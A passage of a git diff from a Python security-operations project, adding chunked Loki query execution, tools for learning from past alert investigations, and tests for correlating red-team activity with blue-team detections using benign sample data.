Returns: + Merged results from all chunks + """ + chunk_delta = timedelta(minutes=self.chunk_size_minutes) + chunks = [] + current_start = start_dt + + while current_start < end_dt: + current_end = min(current_start + chunk_delta, end_dt) + chunks.append((current_start, current_end)) + current_start = current_end + + logger.info(f"Executing query in {len(chunks)} chunks of {self.chunk_size_minutes}min each") + + all_results = [] + failed_chunks = [] + + for i, (chunk_start, chunk_end) in enumerate(chunks): + logger.debug(f"Executing chunk {i + 1}/{len(chunks)}") + + chunk_result = await self.execute_with_resilience( + query_fn, + query, + chunk_start.isoformat().replace("+00:00", "Z"), + chunk_end.isoformat().replace("+00:00", "Z"), + **kwargs, + ) + + if isinstance(chunk_result, dict) and chunk_result.get("status") == "error": + failed_chunks.append(i) + logger.warning(f"Chunk {i + 1} failed: {chunk_result.get('error')}") + else: + all_results.append(chunk_result) + + # Merge results + merged = self._merge_chunk_results(all_results) + + if isinstance(merged, dict): + merged["_chunked_execution"] = { + "total_chunks": len(chunks), + "successful_chunks": len(all_results), + "failed_chunks": len(failed_chunks), + "chunk_size_minutes": self.chunk_size_minutes, + } + + if failed_chunks: + logger.warning(f"{len(failed_chunks)}/{len(chunks)} chunks failed") + + return merged + + def _merge_chunk_results(self, results: list[dict[str, Any]]) -> dict[str, Any]: + """Merge results from multiple chunks. + + Args: + results: List of query results from chunks + + Returns: + Merged result dict + """ + if not results: + return {"status": "success", "data": {"result": []}} + + # For Loki-style results, merge the streams + merged_streams = [] + for result in results: + if isinstance(result, dict): + data = result.get("data", {}) + streams = data.get("result", []) + merged_streams.extend(streams) + + return { + "status": "success", + "data": {"result": merged_streams}, + } + + def _count_results(self, result: Any) -> int: + """Count the number of results in a query response.""" + if isinstance(result, list): + return len(result) + if isinstance(result, dict): + data = result.get("data", {}) + streams = data.get("result", []) + if isinstance(streams, list): + total = 0 + for stream in streams: + values = stream.get("values", []) + total += len(values) if isinstance(values, list) else 0 + return total + return 0 + + def get_stats_summary(self) -> dict[str, Any]: + """Get a summary of query statistics. + + Returns: + Dict with query execution statistics + """ + return { + "total_attempts": self.stats.total_attempts, + "successful_attempts": self.stats.successful_attempts, + "success_rate": f"{self.stats.success_rate * 100:.1f}%", + "timeout_count": self.stats.timeout_count, + "retry_count": self.stats.retry_count, + "time_range_reductions": self.stats.time_range_reductions, + } + + +# Singleton instance for global use +_resilient_executor: QueryResilientExecutor | None = None + + +def get_resilient_executor() -> QueryResilientExecutor: + """Get or create the global resilient executor instance.""" + global _resilient_executor + if _resilient_executor is None: + _resilient_executor = QueryResilientExecutor() + return _resilient_executor + + +def reset_resilient_executor() -> None: + """Reset the global executor (for testing or new investigations).""" + global _resilient_executor + _resilient_executor = None diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py index 9a4c80c3..51c278fd 100644 --- a/src/ares/core/remote.py +++ b/src/ares/core/remote.py @@ -229,7 +229,6 @@ def run_command( except (TokenRetrievalError, SSOTokenLoadError) as e: self._handle_sso_error(e) except ClientError as e: - # Check if this is an SSO-related error error_str = str(e).lower() if "token" in error_str and ("expired" in error_str or "sso" in error_str): self._handle_sso_error(e) diff --git a/src/ares/integrations/mitre.py b/src/ares/integrations/mitre.py index 46c7ea70..e3fef207 100644 --- a/src/ares/integrations/mitre.py +++ b/src/ares/integrations/mitre.py @@ -103,7 +103,6 @@ async def load(self) -> None: response.raise_for_status() bundle = response.json() - # Parse STIX objects for obj in bundle.get("objects", []): obj_type = obj.get("type") @@ -131,12 +130,10 @@ def _parse_technique(self, obj: dict) -> None: if not technique_id: return - # Get tactic from kill chain kill_chain = obj.get("kill_chain_phases", []) tactic_shortname = kill_chain[0]["phase_name"] if kill_chain else "unknown" tactic_id = self.TACTIC_MAP.get(tactic_shortname, "") - # Check if subtechnique is_subtechnique = obj.get("x_mitre_is_subtechnique", False) parent = None if is_subtechnique and "." in technique_id: diff --git a/src/ares/main.py b/src/ares/main.py index 04a5260d..eb452fa5 100644 --- a/src/ares/main.py +++ b/src/ares/main.py @@ -87,7 +87,6 @@ async def main( args = args or Args() dn_args = dn_args or DreadnodeArgs() - # Get API keys from environment if not provided grafana_api_key = args.grafana_api_key or os.getenv("GRAFANA_API_KEY", "") dreadnode_token = dn_args.token or os.getenv("DREADNODE_API_KEY", "") @@ -116,7 +115,6 @@ async def main( from ares.integrations.mitre import MITREAttackClient from ares.tools.blue import GrafanaTools - # Initialize MITRE client logger.info("Loading MITRE ATT&CK data from STIX repository...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -129,7 +127,6 @@ async def main( report_dir.mkdir(parents=True, exist_ok=True) logger.info(f"Reports: {report_dir}") - # Initialize orchestrator orchestrator = InvestigationOrchestrator( model=args.model, grafana_url=args.grafana_url, @@ -139,7 +136,6 @@ async def main( max_steps=args.max_steps, ) - # Initialize Grafana client for polling grafana = GrafanaTools( base_url=args.grafana_url, api_key=grafana_api_key, @@ -158,7 +154,6 @@ async def main( try: while True: try: - # Poll for firing alerts alerts = await grafana.get_firing_alerts() for alert in alerts: @@ -244,7 +239,6 @@ async def investigate_alert( args = args or Args() dn_args = dn_args or DreadnodeArgs() - # Parse alert if alert_json.startswith("{"): alert = json.loads(alert_json) else: @@ -266,7 +260,6 @@ async def investigate_alert( from ares.agents.blue import InvestigationOrchestrator from ares.integrations.mitre import MITREAttackClient - # Load MITRE data logger.info("Loading MITRE ATT&CK data...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -350,7 +343,6 @@ async def redteam( from ares.agents.red import RedTeamOrchestrator from ares.integrations.mitre import MITREAttackClient - # Load MITRE data logger.info("Loading MITRE ATT&CK data...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -363,7 +355,6 @@ async def redteam( report_dir.mkdir(parents=True, exist_ok=True) logger.info(f"Reports: {report_dir}") - # Create orchestrator orchestrator = RedTeamOrchestrator( model=args.model, mitre_client=mitre_client, diff --git a/src/ares/reports/redteam.py b/src/ares/reports/redteam.py index 507cce05..3d31e3e0 100644 --- a/src/ares/reports/redteam.py +++ b/src/ares/reports/redteam.py @@ -30,11 +30,9 @@ def generate(self, state: RedTeamState) -> str: Returns: Complete markdown report as a string. """ - # Calculate duration duration = datetime.now(timezone.utc) - state.started_at - duration_str = str(duration).split(".")[0] # Remove microseconds + duration_str = str(duration).split(".")[0] - # Generate executive summary executive_summary = self._generate_executive_summary(state) # Render the report using the template diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py index 76b4f07c..52b04b47 100644 --- a/src/ares/tools/blue/__init__.py +++ b/src/ares/tools/blue/__init__.py @@ -3,6 +3,7 @@ from ares.tools.blue.actions import CompletionTools, escalate_investigation from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools +from ares.tools.blue.learning import LearningTools from ares.tools.blue.observability import LokiTools, PrometheusTools from ares.tools.blue.query_templates import QueryTemplateTools @@ -10,6 +11,7 @@ "CompletionTools", "GrafanaTools", "InvestigationTools", + "LearningTools", "LokiTools", "PrometheusTools", "QueryTemplateTools", diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index fc8baa68..d053ee93 100644 --- a/src/ares/tools/blue/actions.py +++ b/src/ares/tools/blue/actions.py @@ -69,7 +69,6 @@ async def complete_investigation( ... ) 'Investigation completed. Report will be generated.' """ - # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." @@ -92,7 +91,6 @@ async def complete_investigation( alert_annotations = self.state.alert.get("annotations", {}) response_guidance = alert_annotations.get("response", "") if response_guidance: - # Parse numbered or bulleted steps from response import re steps = re.split(r"\d+\.\s+", response_guidance) @@ -132,7 +130,6 @@ def _generate_fallback_synopsis(self) -> None: parts = [] - # Get alert info alert_name = self.state.alert.get("labels", {}).get("alertname", "Unknown alert") severity = self.state.alert.get("labels", {}).get("severity", "unknown") starts_at = self.state.alert.get("startsAt", "") @@ -142,12 +139,10 @@ def _generate_fallback_synopsis(self) -> None: if starts_at: parts.append(f"Alert triggered at {starts_at}.") - # Add technique info if self.state.identified_techniques: techniques = ", ".join(list(self.state.identified_techniques)[:3]) parts.append(f"MITRE techniques identified: {techniques}.") - # Add host/user info if self.state.queried_hosts: hosts = ", ".join(list(self.state.queried_hosts)[:3]) parts.append(f"Hosts involved: {hosts}.") @@ -156,10 +151,8 @@ def _generate_fallback_synopsis(self) -> None: users = ", ".join(list(self.state.queried_users)[:3]) parts.append(f"Users involved: {users}.") - # Add evidence summary if self.state.evidence: parts.append(f"{len(self.state.evidence)} evidence items collected.") - # Get highest-level evidence high_level = [e for e in self.state.evidence if e.pyramid_level.value >= 5] if high_level: parts.append(f"{len(high_level)} high-value indicators (tools/TTPs) identified.") diff --git a/src/ares/tools/blue/learning.py b/src/ares/tools/blue/learning.py new file mode 100644 index 00000000..38a8fb40 --- /dev/null +++ b/src/ares/tools/blue/learning.py @@ -0,0 +1,347 @@ +""" +Learning tools for querying past investigations and improving detection. + +These tools allow the agent to learn from previous investigations +and apply that knowledge to new alerts. +""" + +from typing import Any + +import dreadnode as dn +from dreadnode.agent.tools.base import Toolset +from loguru import logger + +from ares.core.persistence import InvestigationStore, get_investigation_store + + +class LearningTools(Toolset): # type: ignore[misc] + """Tools for learning from past investigations. + + Provides access to historical investigation data, query effectiveness + statistics, and false positive patterns. + """ + + def __init__(self, store: InvestigationStore | None = None): + """Initialize learning tools. + + Args: + store: Optional investigation store (uses global store if not provided) + """ + self._store = store + + @property + def store(self) -> InvestigationStore: + """Get the investigation store.""" + if self._store is None: + self._store = get_investigation_store() + return self._store + + @dn.tool_method # type: ignore[untyped-decorator] + async def find_similar_investigations( + self, + alert_name: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + limit: int = 5, + ) -> dict[str, Any]: + """Find similar past investigations to learn from. + + Use this at the start of an investigation to see how similar alerts + were handled in the past and what queries were effective. + + Args: + alert_name: Name of the current alert + technique_id: MITRE ATT&CK technique ID (e.g., "T1003.001") + severity: Alert severity level + limit: Maximum number of results (default 5) + + Returns: + Dictionary containing similar investigations and their outcomes + """ + dn.log_metric("learning_similar_lookup", 1, mode="count") + logger.info( + f"Looking up similar investigations: alert={alert_name}, technique={technique_id}" + ) + + similar = self.store.find_similar_investigations( + alert_name=alert_name, + technique_id=technique_id, + severity=severity, + limit=limit, + ) + + if not similar: + return { + "found": False, + "message": "No similar investigations found. This may be a new alert type.", + "investigations": [], + } + + results = [] + for sim in similar: + inv = sim.investigation + results.append( + { + "investigation_id": inv.investigation_id, + "alert_name": inv.alert_name, + "technique_id": inv.technique_id, + "similarity_score": sim.similarity_score, + "matching_factors": sim.matching_factors, + "outcome": { + "status": inv.status, + "evidence_count": inv.evidence_count, + "highest_pyramid_level": inv.highest_pyramid_level, + "is_true_positive": inv.is_true_positive, + }, + "duration_seconds": inv.duration_seconds, + "effective_queries": inv.effective_queries[:3], # Top 3 effective queries + "techniques_identified": inv.techniques_identified, + } + ) + + # Add summary guidance + completed_count = sum(1 for s in similar if s.investigation.status == "completed") + avg_evidence = sum(s.investigation.evidence_count for s in similar) / len(similar) + + true_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is True) + false_positive_count = sum(1 for s in similar if s.investigation.is_true_positive is False) + + return { + "found": True, + "count": len(results), + "summary": { + "completion_rate": f"{completed_count / len(similar) * 100:.0f}%", + "avg_evidence_count": round(avg_evidence, 1), + "true_positives": true_positive_count, + "false_positives": false_positive_count, + }, + "investigations": results, + "guidance": self._generate_guidance(similar), + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_effective_queries( + self, + alert_name: str | None = None, + limit: int = 10, + ) -> dict[str, Any]: + """Get the most effective queries for this type of alert. + + Returns queries that have historically produced evidence, + ranked by effectiveness. + + Args: + alert_name: Filter by alert type (optional) + limit: Maximum number of queries to return + + Returns: + Dictionary with effective queries and their statistics + """ + dn.log_metric("learning_query_lookup", 1, mode="count") + logger.info(f"Looking up effective queries for alert: {alert_name}") + + effective = self.store.get_effective_queries( + alert_type=alert_name, + min_evidence_rate=0.2, # At least 20% evidence rate + limit=limit, + ) + + if not effective: + return { + "found": False, + "message": "No query effectiveness data available yet.", + "queries": [], + } + + queries = [] + for qe in effective: + queries.append( + { + "query_pattern": qe.query_pattern, + "total_uses": qe.total_executions, + "success_rate": f"{qe.success_rate * 100:.0f}%", + "evidence_rate": f"{qe.evidence_rate * 100:.0f}%", + "used_for_alerts": qe.alert_types[:5], # Limit alert types shown + } + ) + + return { + "found": True, + "count": len(queries), + "queries": queries, + "recommendation": ( + "Use these queries as starting points. They have historically " + "produced evidence for similar alerts. Adapt the patterns to " + "your specific investigation context." + ), + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def check_false_positive_pattern( + self, + alert_name: str, + alert_fingerprint: str | None = None, + ) -> dict[str, Any]: + """Check if this alert matches a known false positive pattern. + + Use this to quickly identify if an alert is likely a false positive + based on historical data. + + Args: + alert_name: Name of the alert + alert_fingerprint: Unique fingerprint/rule UID of the alert + + Returns: + Dictionary with false positive assessment + """ + dn.log_metric("learning_fp_check", 1, mode="count") + logger.info(f"Checking false positive patterns for: {alert_name}") + + # Check for similar false positives + similar = self.store.find_similar_investigations( + alert_name=alert_name, + alert_fingerprint=alert_fingerprint, + limit=20, + ) + + if not similar: + return { + "is_known_pattern": False, + "message": "No historical data for this alert type.", + "confidence": "low", + } + + # Count true/false positives + true_positives = sum(1 for s in similar if s.investigation.is_true_positive is True) + false_positives = sum(1 for s in similar if s.investigation.is_true_positive is False) + unlabeled = len(similar) - true_positives - false_positives + + # Calculate false positive likelihood + if true_positives + false_positives > 0: + fp_rate = false_positives / (true_positives + false_positives) + else: + fp_rate = 0.0 + + # Check known FP patterns + fp_patterns = self.store.get_false_positive_patterns(min_occurrences=2) + matching_pattern = None + for pattern in fp_patterns: + if pattern["alert_name"] == alert_name: + matching_pattern = pattern + break + + if matching_pattern and matching_pattern["occurrences"] >= 3: + return { + "is_known_pattern": True, + "confidence": "high", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "occurrences": matching_pattern["occurrences"], + "pattern": matching_pattern, + "recommendation": ( + "This alert has been marked as false positive multiple times. " + "Consider quick validation and early completion if indicators match." + ), + } + + if fp_rate > 0.7: + return { + "is_known_pattern": True, + "confidence": "medium", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "true_positives": true_positives, + "false_positives": false_positives, + "recommendation": ( + "This alert type has a high false positive rate. " + "Prioritize quick validation queries before deep investigation." + ), + } + + return { + "is_known_pattern": False, + "confidence": "medium" if unlabeled < len(similar) / 2 else "low", + "false_positive_rate": f"{fp_rate * 100:.0f}%", + "true_positives": true_positives, + "false_positives": false_positives, + "unlabeled": unlabeled, + "message": "No strong false positive pattern detected. Proceed with normal investigation.", + } + + @dn.tool_method # type: ignore[untyped-decorator] + async def get_investigation_statistics(self) -> dict[str, Any]: + """Get overall investigation statistics. + + Returns aggregated statistics about past investigations, + useful for understanding overall detection performance. + + Returns: + Dictionary with investigation statistics + """ + dn.log_metric("learning_stats_lookup", 1, mode="count") + + stats = self.store.get_statistics() + + return { + "total_investigations": stats["total_investigations"], + "status_distribution": stats["status_distribution"], + "performance": { + "avg_evidence_count": stats["avg_evidence_count"], + "avg_pyramid_level": stats["avg_pyramid_level"], + "avg_duration_seconds": stats["avg_duration_seconds"], + }, + "query_insights": { + "total_query_patterns": stats["total_query_patterns"], + "avg_evidence_rate": f"{stats['avg_query_evidence_rate']}%", + }, + "labeling": stats["labeling"], + } + + def _generate_guidance(self, similar: list) -> str: + """Generate investigation guidance based on similar investigations.""" + if not similar: + return "No historical guidance available." + + # Find most successful investigation + completed = [s for s in similar if s.investigation.status == "completed"] + if not completed: + return "Previous investigations of this type did not complete successfully." + + # Get investigation with most evidence + best = max(completed, key=lambda x: x.investigation.evidence_count) + + guidance_parts = [] + + if best.investigation.evidence_count > 0: + guidance_parts.append( + f"Past investigations found an average of " + f"{sum(s.investigation.evidence_count for s in completed) / len(completed):.1f} " + f"evidence items." + ) + + if best.investigation.effective_queries: + guidance_parts.append( + f"Effective queries to try: {', '.join(best.investigation.effective_queries[:2])}" + ) + + # Check for common outcomes + true_positive_rate = ( + sum(1 for s in similar if s.investigation.is_true_positive is True) / len(similar) * 100 + if similar + else 0 + ) + + if true_positive_rate > 70: + guidance_parts.append( + f"This alert type has a {true_positive_rate:.0f}% true positive rate - " + "likely worth thorough investigation." + ) + elif true_positive_rate < 30: + guidance_parts.append( + f"This alert type has only a {true_positive_rate:.0f}% true positive rate - " + "consider quick validation first." + ) + + return ( + " ".join(guidance_parts) + if guidance_parts + else "Proceed with standard investigation approach." + ) diff --git a/src/ares/tools/blue/observability.py b/src/ares/tools/blue/observability.py index 8c405ddf..380aa3a5 100644 --- a/src/ares/tools/blue/observability.py +++ b/src/ares/tools/blue/observability.py @@ -76,7 +76,6 @@ async def query_logs( query_logs_around_timestamp: For time-window queries around a specific event. get_label_values: For discovering available log labels. """ - # Validate query to prevent empty-compatible regex errors if '=~".*"' in logql or "=~'.*'" in logql: return { "status": "error", @@ -109,7 +108,6 @@ async def query_logs( except httpx.HTTPError as e: logger.error(f"Loki query failed: {e}") logger.error(f"Failed query was: {logql}") - # Return detailed error for the agent to learn from return { "status": "error", "error": str(e), @@ -185,7 +183,6 @@ async def query_logs_progressive( limit=limit, ) - # Check if we got results data = result.get("data", {}) results = data.get("result", []) if results: diff --git a/tests/test_correlation.py b/tests/test_correlation.py new file mode 100644 index 00000000..8819735e --- /dev/null +++ b/tests/test_correlation.py @@ -0,0 +1,735 @@ +"""Tests for the Red-Blue Correlation Engine.""" + +import tempfile +from datetime import datetime, timedelta, timezone +from pathlib import Path + +import pytest + +from ares.core.correlation import ( + BlueTeamDetection, + CorrelationMatch, + CorrelationReport, + DetectionGap, + RedBlueCorrelator, + RedTeamActivity, +) + + +@pytest.fixture +def temp_reports_dir() -> Path: + """Create a temporary reports directory.""" + with tempfile.TemporaryDirectory() as tmpdir: + yield Path(tmpdir) + + +@pytest.fixture +def sample_red_activity() -> RedTeamActivity: + """Create a sample red team activity.""" + return RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Executed PowerShell command for reconnaissance", + target_ip="192.168.1.100", + target_host="server01", + credential_used="admin", + success=True, + metadata={"command": "Get-Process"}, + ) + + +@pytest.fixture +def sample_blue_detection() -> BlueTeamDetection: + """Create a sample blue team detection.""" + return BlueTeamDetection( + timestamp=datetime(2024, 1, 15, 10, 32, 0, tzinfo=timezone.utc), + alert_name="Suspicious PowerShell Activity", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host="server01", + investigation_id="inv-001", + status="completed", + evidence_count=5, + highest_pyramid_level=3, + metadata={"rule_id": "rule-ps-001"}, + ) + + +class TestRedTeamActivity: + """Tests for RedTeamActivity dataclass.""" + + def test_key_generation(self, sample_red_activity: RedTeamActivity) -> None: + """Test unique key generation.""" + key = sample_red_activity.key + + assert "2024-01-15" in key + assert "T1059.001" in key + assert "192.168.1.100" in key + + def test_key_uniqueness(self) -> None: + """Test that different activities have different keys.""" + activity1 = RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 1", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ) + activity2 = RedTeamActivity( + timestamp=datetime(2024, 1, 15, 10, 31, 0, tzinfo=timezone.utc), + technique_id="T1059.001", + technique_name="PowerShell", + action="Action 2", + target_ip="192.168.1.100", + target_host=None, + credential_used=None, + success=True, + ) + + assert activity1.key != activity2.key + + +class TestBlueTeamDetection: + """Tests for BlueTeamDetection dataclass.""" + + def test_key_generation(self, sample_blue_detection: BlueTeamDetection) -> None: + """Test unique key generation.""" + key = sample_blue_detection.key + + assert "2024-01-15" in key + assert "T1059.001" in key + assert "Suspicious PowerShell Activity" in key + + +class TestCorrelationMatch: + """Tests for CorrelationMatch dataclass.""" + + def test_match_quality_strong( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test strong match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=120.0, # 2 minutes + technique_match=True, + target_match=True, + confidence=0.9, + ) + + assert match.match_quality == "STRONG" + + def test_match_quality_good( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test good match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=400.0, # ~7 minutes + technique_match=True, + target_match=False, + confidence=0.6, + ) + + assert match.match_quality == "GOOD" + + def test_match_quality_weak( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test weak match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=700.0, # ~12 minutes + technique_match=True, + target_match=False, + confidence=0.4, + ) + + assert match.match_quality == "WEAK" + + def test_match_quality_tenuous( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test tenuous match quality classification.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=700.0, + technique_match=False, + target_match=False, + confidence=0.2, + ) + + assert match.match_quality == "TENUOUS" + + +class TestCorrelationReport: + """Tests for CorrelationReport dataclass.""" + + def test_to_dict( + self, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test conversion to dictionary.""" + match = CorrelationMatch( + red_activity=sample_red_activity, + blue_detection=sample_blue_detection, + time_delta_seconds=120.0, + technique_match=True, + target_match=True, + confidence=0.9, + ) + + gap = DetectionGap( + red_activity=sample_red_activity, + reason="No alert rule configured", + recommended_detection="Add PowerShell monitoring", + ) + + report = CorrelationReport( + analysis_timestamp=datetime.now(timezone.utc), + red_operation_id="op-001", + time_window_start=datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc), + time_window_end=datetime(2024, 1, 15, 11, 0, 0, tzinfo=timezone.utc), + total_red_activities=10, + total_blue_detections=8, + matched_activities=7, + undetected_activities=3, + false_positive_detections=1, + matches=[match], + gaps=[gap], + false_positives=[sample_blue_detection], + detection_rate=0.7, + false_positive_rate=0.125, + mean_time_to_detect=120.0, + technique_coverage={ + "T1059.001": {"total": 5, "detected": 4, "missed": 1, "detection_rate": 0.8} + }, + ) + + data = report.to_dict() + + assert data["red_operation_id"] == "op-001" + assert data["summary"]["total_red_activities"] == 10 + assert data["summary"]["detection_rate"] == "70.0%" + assert len(data["matches"]) == 1 + assert len(data["gaps"]) == 1 + assert "T1059.001" in data["technique_coverage"] + + +class TestRedBlueCorrelator: + """Tests for RedBlueCorrelator.""" + + def test_init(self, temp_reports_dir: Path) -> None: + """Test correlator initialization.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + assert correlator.reports_dir == temp_reports_dir + assert correlator.time_window == timedelta(minutes=30) + + def test_init_custom_time_window(self, temp_reports_dir: Path) -> None: + """Test correlator with custom time window.""" + correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=60) + + assert correlator.time_window == timedelta(minutes=60) + + def test_correlate_perfect_match( + self, + temp_reports_dir: Path, + sample_red_activity: RedTeamActivity, + sample_blue_detection: BlueTeamDetection, + ) -> None: + """Test correlation with perfect technique and target match.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[sample_blue_detection], + operation_id="test-op", + ) + + assert report.total_red_activities == 1 + assert report.total_blue_detections == 1 + assert report.matched_activities == 1 + assert report.undetected_activities == 0 + assert len(report.matches) == 1 + assert report.matches[0].technique_match is True + assert report.matches[0].target_match is True + + def test_correlate_no_match_outside_time_window( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test that activities outside time window are not matched.""" + correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=10) + + # Detection 1 hour after activity + late_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(hours=1), + alert_name="Late Detection", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-late", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[late_detection], + operation_id="test-op", + ) + + assert report.matched_activities == 0 + assert report.undetected_activities == 1 + + def test_correlate_technique_mismatch( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test correlation with technique mismatch.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + wrong_technique_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=2), + alert_name="Different Technique", + technique_id="T1003.001", # Different technique + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-001", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[wrong_technique_detection], + operation_id="test-op", + ) + + # Should still match based on target and time proximity + assert len(report.matches) == 1 + assert report.matches[0].technique_match is False + assert report.matches[0].target_match is True + + def test_correlate_multiple_activities(self, temp_reports_dir: Path) -> None: + """Test correlation with multiple activities and detections.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + # Use different target IPs to prevent cross-matching via target + red_activities = [ + RedTeamActivity( + timestamp=base_time + timedelta(minutes=i * 10), + technique_id=f"T100{i}", + technique_name=f"Technique {i}", + action=f"Action {i}", + target_ip=f"192.168.1.{100 + i}", # Different IPs + target_host=None, + credential_used=None, + success=True, + ) + for i in range(5) + ] + + # Only detect 3 of 5 activities (matching technique and target) + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=i * 10 + 2), + alert_name=f"Alert {i}", + technique_id=f"T100{i}", + severity="high", + target_ip=f"192.168.1.{100 + i}", # Matching IPs + target_host=None, + investigation_id=f"inv-{i}", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + for i in [0, 2, 4] # Only detect activities 0, 2, 4 + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + assert report.total_red_activities == 5 + assert report.total_blue_detections == 3 + assert report.matched_activities == 3 + assert report.undetected_activities == 2 + assert report.detection_rate == 0.6 + + def test_correlate_empty_activities(self, temp_reports_dir: Path) -> None: + """Test correlation with no activities.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + report = correlator.correlate( + red_activities=[], + blue_detections=[], + operation_id="empty-op", + ) + + assert report.total_red_activities == 0 + assert report.detection_rate == 0.0 + + def test_correlate_identifies_false_positives( + self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity + ) -> None: + """Test that unmatched detections are identified as false positives.""" + correlator = RedBlueCorrelator(temp_reports_dir) + + # Detection without corresponding red activity + unrelated_detection = BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=5), + alert_name="Unrelated Alert", + technique_id="T9999", # No matching red activity + severity="low", + target_ip="10.0.0.1", # Different target + target_host=None, + investigation_id="inv-fp", + status="completed", + evidence_count=0, + highest_pyramid_level=0, + ) + + report = correlator.correlate( + red_activities=[sample_red_activity], + blue_detections=[ + BlueTeamDetection( + timestamp=sample_red_activity.timestamp + timedelta(minutes=2), + alert_name="Matching Alert", + technique_id="T1059.001", + severity="high", + target_ip="192.168.1.100", + target_host=None, + investigation_id="inv-001", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ), + unrelated_detection, + ], + operation_id="test-op", + ) + + assert len(report.false_positives) == 1 + assert report.false_positives[0].alert_name == "Unrelated Alert" + + def test_technique_coverage_calculation(self, temp_reports_dir: Path) -> None: + """Test technique coverage calculation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + # Create activities with DIFFERENT techniques and targets for clear matching + # This ensures each activity can only match its corresponding detection + red_activities = [ + RedTeamActivity( + timestamp=base_time + timedelta(minutes=i * 10), + technique_id=f"T105{i}", # Different technique per activity + technique_name=f"Technique {i}", + action=f"Action {i}", + target_ip=f"192.168.1.{100 + i}", # Different targets + target_host=None, + credential_used=None, + success=True, + ) + for i in range(4) + ] + + # Only detect 3 of 4 (activities 0, 1, 2 but not 3) + blue_detections = [ + BlueTeamDetection( + timestamp=base_time + timedelta(minutes=i * 10, seconds=30), + alert_name=f"Alert {i}", + technique_id=f"T105{i}", # Matching technique + severity="high", + target_ip=f"192.168.1.{100 + i}", # Matching targets + target_host=None, + investigation_id=f"inv-{i}", + status="completed", + evidence_count=1, + highest_pyramid_level=1, + ) + for i in range(3) # Only first 3 activities get detected + ] + + report = correlator.correlate( + red_activities=red_activities, + blue_detections=blue_detections, + operation_id="test-op", + ) + + # Should have coverage data for all 4 techniques + assert len(report.technique_coverage) == 4 + # 3 techniques should be detected (T1050, T1051, T1052) + # 1 technique should be missed (T1053) + detected_count = sum(1 for t in report.technique_coverage.values() if t["detected"] > 0) + missed_count = sum(1 for t in report.technique_coverage.values() if t["missed"] > 0) + assert detected_count == 3 + assert missed_count == 1 + assert report.matched_activities == 3 + assert report.undetected_activities == 1 + + def test_mean_time_to_detect( + self, + temp_reports_dir: Path, + ) -> None: + """Test mean time to detect calculation.""" + correlator = RedBlueCorrelator(temp_reports_dir) + base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc) + + red_activities = [ + RedTeamActivity( + timestamp=base_time, + technique_id="T1059.001", + 